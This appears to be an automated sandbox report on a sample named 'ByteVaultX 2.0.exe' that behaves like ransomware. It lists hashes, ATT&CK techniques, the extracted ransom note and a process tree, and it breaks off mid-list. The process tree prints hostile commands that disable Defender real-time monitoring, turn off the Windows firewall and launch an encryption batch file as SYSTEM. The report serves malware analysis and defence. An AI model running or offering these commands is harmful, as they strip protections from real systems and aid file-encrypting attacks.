958e65dedf5f42e310cbf4e7ba87ce130c2b60d95afb1da8f7390f2002f6caa2

Resubmissions

22-05-2024 15:54

240522-tca45sgd54 10

22-05-2024 15:32

19-05-2024 21:56

19-05-2024 21:54

19-05-2024 21:53

19-05-2024 20:56

18-05-2024 09:15

18-05-2024 00:54

Analysis

max time kernel
986s
max time network
974s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
19-05-2024 20:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ByteVaultX 2.0.exe
Size

9.9MB
MD5

98e3408a9432d5046691c4cc744eb244
SHA1

c1e9d2c89d2cb72ee2f0f11ef97b2cb07d070142
SHA256

958e65dedf5f42e310cbf4e7ba87ce130c2b60d95afb1da8f7390f2002f6caa2
SHA512

dd4451441a051a6e9cc1be16702aaea1ce0fee4bd78c30cde050636e573b0ec1fcae4cde654a1928c941410840b8d0f989932779fc59e7bf70ce444029e689d5
SSDEEP

196608:ShFaRIk7AHkPkRJW9GNZA1HeT39Iig6eE9TFa0Z8DOjCdylNo1nz8QW7tx:tGFG8S1+TtIi+Y9Z8D8CclydoPx

Score

10^/10

evasion execution ransomware

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg

Extracted

Path

C:\Encrypt\encrypt.html

Ransom Note

Your Files Have Been Encrypted Your Files Have Been Encrypted By The ByteVaultX Test-Ransomware The price for the Decryption is $0 in Bitcoin (BTC). Follow these steps to get your decryption: You Do It. But Remember this malware is Just For VMS This is a Test Ransomware Your Files Have Been Encrypted By The ByteVaultX Test-Ransomware Ask AI How to Use the Ransomware key with the decryption algorithm (in this case, the Fernet decryption algorithm) to decrypt each encrypted file. Save the decrypted data to new files or overwrite the original encrypted files if desired. You Will Also Have To install Python and cryptography Please note that the dercyption key is in the path C:\encrypt\Key.txt and please note you have infinite time For support, you can ask ai how to encrypt your data Trustet AI

Signatures

Renames multiple (139) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

34 2532 powershell.exe
36 1712 powershell.exe
Disables Task Manager via registry modification
evasion

flow	pid	process
34	2532	powershell.exe
36	1712	powershell.exe

Modifies Windows Firewall 2 TTPs 11 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

pid	process
3668	netsh.exe
3316	netsh.exe
2928	netsh.exe
1304	netsh.exe
512	netsh.exe
1240	netsh.exe
2644	netsh.exe
3312	netsh.exe
2328	netsh.exe
1528	netsh.exe
1304	netsh.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

ByteVaultX 2.0.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	ByteVaultX 2.0.exe

Loads dropped DLL 12 IoCs

Processes:

ByteVaultX 2.0.exe

pid	process
1852	ByteVaultX 2.0.exe
1852	ByteVaultX 2.0.exe
1852	ByteVaultX 2.0.exe
1852	ByteVaultX 2.0.exe
1852	ByteVaultX 2.0.exe
1852	ByteVaultX 2.0.exe
1852	ByteVaultX 2.0.exe
1852	ByteVaultX 2.0.exe
1852	ByteVaultX 2.0.exe
1852	ByteVaultX 2.0.exe
1852	ByteVaultX 2.0.exe
1852	ByteVaultX 2.0.exe

Drops desktop.ini file(s) 8 IoCs

Processes:

ByteVaultX 2.0.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Documents\desktop.ini	ByteVaultX 2.0.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	ByteVaultX 2.0.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	ByteVaultX 2.0.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	ByteVaultX 2.0.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	ByteVaultX 2.0.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	ByteVaultX 2.0.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	ByteVaultX 2.0.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	ByteVaultX 2.0.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 20 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
212	powershell.exe
5080	powershell.exe
2532	powershell.exe
1880	powershell.exe
4508	powershell.exe
928	powershell.exe
2648	powershell.exe
1320	powershell.exe
2544	powershell.exe
1580	powershell.exe
220	powershell.exe
3444	powershell.exe
3992	powershell.exe
2216	powershell.exe
1712	powershell.exe
800	powershell.exe
1884	powershell.exe
1568	powershell.exe
3404	powershell.exe
4964	powershell.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exechrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

Processes:

explorer.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Internet Explorer\Toolbar	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1"	explorer.exe

Modifies registry class 40 IoCs

Processes:

explorer.exepowershell.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0 = 0c0001008421de39050000000000	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "6"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "18874369"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "2"	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\MRUListEx = 00000000ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "48"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\FirewallControlPanel.dll,-12122#immutable1 = "Windows Defender Firewall"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel\WFlags = "0"	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 14001f706806ee260aa0d7449371beb064c986830000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 020000000100000000000000ffffffff	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel\ShowCmd = "1"	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0 = 1e007180000000000000000000002f492640692fb846b9bf5654fc07e4230000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "18874385"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\NodeSlot = "6"	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\MRUListEx = ffffffff	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000010000001800000030f125b7ef471a10a5f102608c9eebac0a000000a0000000	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel\HotKey = "0"	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = 00000000ffffffff	explorer.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

explorer.exe

pid process

2640 explorer.exe

pid	process
2640	explorer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exemsedge.exemsedge.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeidentity_helper.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
212	powershell.exe
212	powershell.exe
1312	msedge.exe
1312	msedge.exe
4904	msedge.exe
4904	msedge.exe
2544	powershell.exe
2544	powershell.exe
2544	powershell.exe
1580	powershell.exe
1580	powershell.exe
1580	powershell.exe
1884	powershell.exe
1884	powershell.exe
1884	powershell.exe
3992	powershell.exe
3992	powershell.exe
3992	powershell.exe
2216	powershell.exe
2216	powershell.exe
2216	powershell.exe
4616	identity_helper.exe
4616	identity_helper.exe
1568	powershell.exe
1568	powershell.exe
1568	powershell.exe
220	powershell.exe
220	powershell.exe
220	powershell.exe
3444	powershell.exe
3444	powershell.exe
3444	powershell.exe
4508	powershell.exe
4508	powershell.exe
4508	powershell.exe
928	powershell.exe
928	powershell.exe
928	powershell.exe
5080	powershell.exe
5080	powershell.exe
5080	powershell.exe
2532	powershell.exe
2532	powershell.exe
2532	powershell.exe
4964	powershell.exe
4964	powershell.exe
4964	powershell.exe
1712	powershell.exe
1712	powershell.exe
1712	powershell.exe
800	powershell.exe
800	powershell.exe
800	powershell.exe
2648	powershell.exe
2648	powershell.exe
2648	powershell.exe
1880	powershell.exe
1880	powershell.exe
1880	powershell.exe
3404	powershell.exe
3404	powershell.exe
3404	powershell.exe
1320	powershell.exe
1320	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

Processes:

msedge.exechrome.exe

pid process

4904 msedge.exe
4904 msedge.exe
4904 msedge.exe
4904 msedge.exe
4904 msedge.exe
4904 msedge.exe
64 chrome.exe
64 chrome.exe
64 chrome.exe

Suspicious use of AdjustPrivilegeToken 26 IoCs

Processes:

description	pid	process
Token: SeDebugPrivilege	212	powershell.exe
Token: SeDebugPrivilege	2544	powershell.exe
Token: SeDebugPrivilege	1580	powershell.exe
Token: SeDebugPrivilege	1884	powershell.exe
Token: SeDebugPrivilege	3992	powershell.exe
Token: SeDebugPrivilege	2216	powershell.exe
Token: SeDebugPrivilege	1568	powershell.exe
Token: SeDebugPrivilege	220	powershell.exe
Token: SeDebugPrivilege	3444	powershell.exe
Token: SeDebugPrivilege	4508	powershell.exe
Token: SeDebugPrivilege	928	powershell.exe
Token: SeDebugPrivilege	5080	powershell.exe
Token: SeDebugPrivilege	2532	powershell.exe
Token: SeDebugPrivilege	4964	powershell.exe
Token: SeDebugPrivilege	1712	powershell.exe
Token: SeDebugPrivilege	800	powershell.exe
Token: SeDebugPrivilege	2648	powershell.exe
Token: SeDebugPrivilege	1880	powershell.exe
Token: SeDebugPrivilege	3404	powershell.exe
Token: SeDebugPrivilege	1320	powershell.exe
Token: SeShutdownPrivilege	64	chrome.exe
Token: SeCreatePagefilePrivilege	64	chrome.exe
Token: SeShutdownPrivilege	64	chrome.exe
Token: SeCreatePagefilePrivilege	64	chrome.exe
Token: SeShutdownPrivilege	2640	explorer.exe
Token: SeCreatePagefilePrivilege	2640	explorer.exe

Suspicious use of FindShellTrayWindow 62 IoCs

Processes:

msedge.exechrome.exeexplorer.exe

pid	process
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
2640	explorer.exe

Suspicious use of SendNotifyMessage 56 IoCs

Processes:

msedge.exechrome.exe

pid	process
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe
64	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

ByteVaultX 2.0.exeByteVaultX 2.0.exemsedge.execmd.exe

description	pid	process	target process
PID 2532 wrote to memory of 1852	2532	ByteVaultX 2.0.exe	ByteVaultX 2.0.exe
PID 2532 wrote to memory of 1852	2532	ByteVaultX 2.0.exe	ByteVaultX 2.0.exe
PID 1852 wrote to memory of 212	1852	ByteVaultX 2.0.exe	powershell.exe
PID 1852 wrote to memory of 212	1852	ByteVaultX 2.0.exe	powershell.exe
PID 1852 wrote to memory of 2928	1852	ByteVaultX 2.0.exe	netsh.exe
PID 1852 wrote to memory of 2928	1852	ByteVaultX 2.0.exe	netsh.exe
PID 1852 wrote to memory of 2648	1852	ByteVaultX 2.0.exe	runas.exe
PID 1852 wrote to memory of 2648	1852	ByteVaultX 2.0.exe	runas.exe
PID 1852 wrote to memory of 4904	1852	ByteVaultX 2.0.exe	msedge.exe
PID 1852 wrote to memory of 4904	1852	ByteVaultX 2.0.exe	msedge.exe
PID 4904 wrote to memory of 1184	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1184	4904	msedge.exe	msedge.exe
PID 1852 wrote to memory of 1364	1852	ByteVaultX 2.0.exe	cmd.exe
PID 1852 wrote to memory of 1364	1852	ByteVaultX 2.0.exe	cmd.exe
PID 1364 wrote to memory of 3400	1364	cmd.exe	reg.exe
PID 1364 wrote to memory of 3400	1364	cmd.exe	reg.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1308	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1312	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1312	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 4512	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 4512	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 4512	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 4512	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 4512	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 4512	4904	msedge.exe	msedge.exe

C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2532

C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"
2⤵
- Checks computer location settings
- Loads dropped DLL
- Drops desktop.ini file(s)
- Suspicious use of WriteProcessMemory
PID:1852

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:212

C:\Windows\SYSTEM32\netsh.exe
netsh advfirewall set allprofiles state off
3⤵
- Modifies Windows Firewall
PID:2928

C:\Windows\SYSTEM32\runas.exe
runas /user:NT-AUTORITÄT\SYSTEM cmd.exe /c "C:\Encrypt\encrypt.bat"
3⤵
PID:2648

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Encrypt\encrypt.html
3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4904

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdcf8f46f8,0x7ffdcf8f4708,0x7ffdcf8f4718
4⤵
PID:1184

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,1287586657488130877,6560110692057221287,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
4⤵
PID:1308

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
